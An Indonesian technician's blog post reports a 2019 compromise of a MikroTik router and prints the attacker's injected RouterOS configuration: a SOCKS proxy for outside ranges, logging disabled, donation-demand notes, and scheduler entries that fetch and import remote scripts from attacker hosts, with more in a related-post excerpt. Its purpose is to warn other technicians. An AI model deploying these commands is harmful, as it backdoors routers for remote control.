Langsung ke konten utama

Mikrotik : Wabah Setahun 2018-2019 yang masih eksis

email : ariyaandro@gmail.com

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

Mikrotik : Wabah November 2018

Mikrotik : Wabah Januari 2019

dari daftar postingan yang termuat, sepertinya bug mikrotik dalam versi yang lebih lama dalam setahun ini masih ada yang menggunakannya. dimana bulan ini serangannya mirip dengan sebelumnnya yaitu melakukan seranga bertahap dari menyisipkan rule pada firewall, note bitcoin, membuat port NAT, mengaktifkan proxy, edit port service mikrotik dan lainnya.

berikut capture serangan yang terjadi

  • penyisipan file html ke storage mikrotik
  • crate user baru dalam mikrotik
  • membuat rule yang lebih banyak dari sebelumnnya dan cirihas bitcoin sertw webmoney

berikut potongan code setting yang di sisipi,… syukur login utama belum terkunci…

#apr/26/2019 10:29:32 by RouterOS 6.39.2

/system logging action
set 1 disk-file-name=log

/ip firewall address-list
add address=10.0.0.0/8 list=allow-ip
add address=100.64.0.0/10 list=allow-ip
add address=172.16.0.0/12 list=allow-ip
add address=192.168.0.0/16 list=allow-ip
add address=127.0.0.1 list=allow-ip

/ip firewall filter
add action=add-src-to-address-list address-list=ip1 address-list-timeout=7s \
chain=input comment=”I closed the vulnerability with a firewall.” \
packet-size=1244 protocol=icmp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=add-src-to-address-list address-list=ip2 address-list-timeout=7s \
chain=input comment=ip2 packet-size=447 protocol=icmp src-address-list=\
ip1
add action=add-src-to-address-list address-list=allow-ip \
address-list-timeout=1h chain=input comment=allow-ip packet-size=447 \
protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=!447 \
protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=397 \
protocol=icmp
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=1083 \
protocol=icmp
add action=drop chain=input comment=\
You can say thanks on the WebMoney Z399578297824″ dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=blacklist
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
chain=input comment=sysadminpxy dst-port=8080 protocol=tcp
add action=accept chain=input comment=sysadmin53u port=53 protocol=udp
add action=accept chain=input comment=sysadmin53t port=53 protocol=tcp
add action=accept chain=input comment=\
“Please update RotherOS and change password.” src-address-list=allow-ip
add action=drop chain=input comment=”or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1\
. My Telegram http://t.me/router_os” dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
add action=accept chain=input comment=\
“Please update RouterOS and change password.” src-address-list=allow-ip
add action=passthrough chain=input
add action=tarpit chain=input comment=\
“Add you ip addess to allow-ip in Address Lists.” dst-port=30553 \
protocol=tcp
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
chain=input dst-port=8080 protocol=tcp

/ip firewall nat
add action=redirect chain=dstnat disabled=yes dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminpxy disabled=yes dst-port=80 \
protocol=tcp src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=554 \
protocol=tcp to-addresses=192.168.1.252 to-ports=554
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=81 \
protocol=tcp to-addresses=192.168.1.252 to-ports=81
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=8000 \
protocol=tcp to-addresses=192.168.1.252 to-ports=8000

/ip proxy
set cache-path=web-proxy1 enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/ip service
set telnet disabled=yes
set ftp disabled=yes
set ssh port=22515
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes

/ip socks
set enabled=yes port=1993

/ip socks access
add src-address=94.130.51.0/24
add src-address=192.243.53.0/24
add src-address=82.204.203.0/24
add src-address=89.175.178.0/24
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0

/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes

/system note
set note=”The security flaw for Hajime is closed by the firewall. Please updat\
e RouterOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
3nUgsdqQawiMLC1bUGDZWHowix1

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235

/system scheduler
add interval=3m name=U6 on-event=”/tool fetch url=http://gamesone.xyz/poll/8bc\
633a0-28b0-4587-9936-18b08a19adda mode=http dst-path=7wmp0b4swouv\r\
\n/import 7wmp0b4swouv” policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Mikrotik : Wabah November 2018

email : ariyaandro@ gmail.com post yang lalu yaitu : Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 update temuan script hacked yang baru lagi,…   /system scheduler add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\ han. pythonanywhere.com /\" dst-path=tmp} on-error={:put \"get http error\"}\ ;\r\ \n/import tmp;\r\ \n/file remove tmp;" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ mar/31/2018 start-time=20:21:00 /system script add name=script4_ owner=xxx policy=\ ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ ddress= 95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\ lt=no"   /ip dns set allow-remote-requests=yes servers=" 94.247.43.254,1\ 07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 " /ip firewall nat add action=redirect chain=dstnat comme...
Posting Komentar
Read more »

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...
Posting Komentar
Read more »

Troubleshoot : intel management engine interface - shutdown problem - can't power off

email : ariyaandro@gmail.com POSTING 797 beberapa waktu lalu mimin ada sedikit problem yang menggangu yaitu ketika PC melakukan proses shutdown selesai, power PC tidak bisa langsung off sempurna (diakhir proses shutdown hanya dim warna hitam saja pada layar) harus dimatikan paksa. namun dengan solusi berikut syukurlah membantu kembali lancar shutdown dengan baik. spek yang sedang digunakan PC yang problem ini yaitu menggunakan Windows 10 Pro 64 bit. setelah mencari artikel yang sesuai berikut https://forums.tomshardware.com/faq/fix-intel-registered-management-engine-interface-has-a-driver-problem.3274586/ https://tencomputer.com/intel-management-engine-interface-driver/ https://www.drivereasy.com/knowledge/intel-r-management-engine-interface-this-device-cannot-start-on-windows-solved/ https://community.spiceworks.com/topic/2095008-remove-intel-management-engine kesimpulan , ada kemungkinan masalah driver yaitu intel management engine interface. maka dilakukan rekomendasi uninstall driv...
Posting Komentar
Read more »